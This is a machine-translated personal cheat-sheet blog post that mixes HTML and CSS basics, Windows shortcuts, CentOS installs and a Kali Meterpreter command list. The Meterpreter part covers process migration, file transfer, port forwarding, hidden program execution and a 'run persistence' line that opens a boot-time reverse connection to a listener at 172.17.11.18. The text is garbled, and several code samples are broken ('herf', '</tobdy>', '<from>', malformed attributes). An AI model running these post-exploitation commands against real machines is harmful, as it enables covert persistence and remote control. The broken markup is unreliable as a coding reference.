当前位置:网站首页>Random notes
Random notes
2022-07-06 09:51:00 【XRSec】
Button popup text
<script type="text/javascript">
function a(){
alert(" What's good-looking ");
}
</script>
<input type="button" value= Button popup text onClick="a()"> form In bold <strong> tilt <em><i> Delete line <del><s> Underline <ins><u> The box <div Occupy a line ><span Span > Images <img src="" alt="" title=" height="" width="" border=" Border properties "> Hyperlinks targrt="_blank""_self" <href=""><img src=""> <a href="#two"> Property introduction Tag attributes <id ="two"> Property introduction Comment tags <!-- --> character Space character < < > > & & ¥ ¥ © ® ° ° -+ ± * × Tabular label Exhibition / Show data <table> Define the label of the table <thead> <tr> Define table rows <th>……</th>html Header part </tr> <thead> <tbody> <tr> Define table rows <td>……</td> Define cells / Content In bold <td>……</td> Define cells / Content </tr> </tobdy> </table> left center right border Frame 1 "" There is no border by default Pixel values cellpadding Default 1 Pixels <-> cellspacing Default 2 Pixels >-< width Width height Height merge cell rowspan Cross bank merger Number Uppermost colspan Cross column merge Number Far left Tabs tab 《 Layout 》 Orderly <ol> <li> </li> <li> </li> </ol> disorder <ul> <li> </li> <li> <p> </p> </li> </ul>
Custom list <dl> <dt> project </dt> <dd> describe </dd> <dd> </dd> Form labels 《 To collect information 》 Form field <form action="demo.php" url method="post" submission name=" Form field name "> <> The form controls <input type=" Property value " /> Prompt information <></> </form> Form Elements <input type=" button Define the click button checkbox Define check boxes file The definition file hidden Define hidden input fields image Define the image form submission button password Define password fields radio Define radio buttons <name> reset Define the button from submit Define submit button text Define the input fields for a single line , Default 20 character "> Form element properties name Definition input Name of element value Regulations input The value of the element Prompt information checked checked="checked" It is stipulated that input The element is selected for the first load maxlength Maximum length <label> input Element definition annotation ( label ) Binding form elements Increase the size of the selection space <input type="radio" name="sex" id="nan"/><label for="nan"> male </label> <input type="radio" name="sex" id="nv"/><label for="nv"> Woman </label> <from> choice : <select> <option selected="selected" value="">1</option>} <option value="">2</option> <option value=""></option> </select> </from> The form controls 《 Form Elements 》
<form>
<textarea name=""cols=" The number of characters per line " rows=" Number of lines displayed "> According to the content </textarea>
</form>
```
**********************************************************
CSS Style sheets
```
<style type="text/css" media="screen">
p {
color: red;
/* Modify the text pixel size */
font-size: 12px;
}
</style>
```
typeface
```
font -weight: The font size
font-size: font size
background-color: The background color
color: The font color
font-style: Font style
```
Text
```
text-align: Text alignment engxius
text-indent: Indent text
text-decoration: Text modification , Underline
line-height: Row height
```
css Embedded tables
```
<style></style> Profits can be put anywhere
Inline style sheets <p style{"color:red"}> Control the current style </p>
External style sheets <link rel="stylesheet" herf="">
Split line <input type="text"><button>
``` Selectors
Elements p span
class #id
attribute img
Pseudo class selector a:hover
typeface
font -weight: The font size
font-size: font size
background-color: The background color
color: The font color
font-style: Font style
Text
text-align: Text alignment engxius
text-indent: Indent text
text-decoration: Text modification , Underline
line-height: Row height
Selectors
Descendant selector
Pseudo class selector
Child selectors ```
win Shortcut key
network adapter ncpa.cpl
The notebook notepad
Remote desktop mstsc
View login query user
** Send a message ** msg user message
The registry regedit
Kali
meterpreter
background # Hang up sessions -l sessions -i number
Process migration
migrate Process number
getwd Check the working directory
uoload Upload files to the target host == scp Double slash escape
download Download the target host file to the local
edit Edit the file
search search -d Lu Jin -f *.name
portfwd Port forwarding
portfwd add -l Receive port -p Forward port -r Listening address
rdesktop -u user -p pwd ip Remote desktop
route View routing table
getuid View the user of the injection target host process
sysinfo system information
ps View process information
migrate Migration process
execute Run the program
execute -H -f xxx.exe The graphical interface is hidden
run persistence -X( Boot from boot ) -l( Time interval between ) 5 -p 4444 -r 172.17.11.18
centos
yum install httpd mysql mysql-server mysql-libs mysql-server -y sudo rpm -Uvh http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm yum clean all yum makecache
边栏推荐
- Yarn organizational structure
- Minio distributed file storage cluster for full stack development
- Nc17 longest palindrome substring
- MapReduce instance (IV): natural sorting
- MySQL数据库优化的几种方式(笔面试必问)
- Libuv thread
- tn-c为何不可用2p断路器?
- 【深度学习】语义分割:论文阅读:(CVPR 2022) MPViT(CNN+Transformer):用于密集预测的多路径视觉Transformer
- 【深度学习】语义分割:论文阅读(NeurIPS 2021)MaskFormer: per-pixel classification is not all you need
- How can I take a shortcut to learn C language in college
猜你喜欢

数据建模有哪些模型

Full stack development of quartz distributed timed task scheduling cluster

机械工程师和电气工程师方向哪个前景比较好?

【深度学习】语义分割-源代码汇总

Lua script of redis

Workflow - activiti7 environment setup

Nc17 longest palindrome substring

英雄联盟轮播图自动轮播

Research and implementation of hospital management inpatient system based on b/s (attached: source code paper SQL file)

A wave of open source notebooks is coming
随机推荐
五月刷题01——数组
Selection of software load balancing and hardware load balancing
O & M, let go of monitoring - let go of yourself
Mapreduce实例(八):Map端join
[flask] crud addition and query operation of data
Redis connection redis service command
Minio distributed file storage cluster for full stack development
嵌入式开发比单片机要难很多?谈谈单片机和嵌入式开发设计经历
[deep learning] semantic segmentation: paper reading: (CVPR 2022) mpvit (cnn+transformer): multipath visual transformer for dense prediction
Hero League rotation chart manual rotation
单片机实现模块化编程:思维+实例+系统教程(实用程度令人发指)
零基础学习单片机切记这四点要求,少走弯路
Workflow - activiti7 environment setup
Mapreduce实例(十):ChainMapReduce
Design and implementation of film and television creation forum based on b/s (attached: source code paper SQL file project deployment tutorial)
面渣逆袭:Redis连环五十二问,图文详解,这下面试稳了
手把手教您怎么编写第一个单片机程序
MapReduce instance (VIII): Map end join
Contrôle de l'exécution du module d'essai par panneau dans Canoe (primaire)
五月刷题03——排序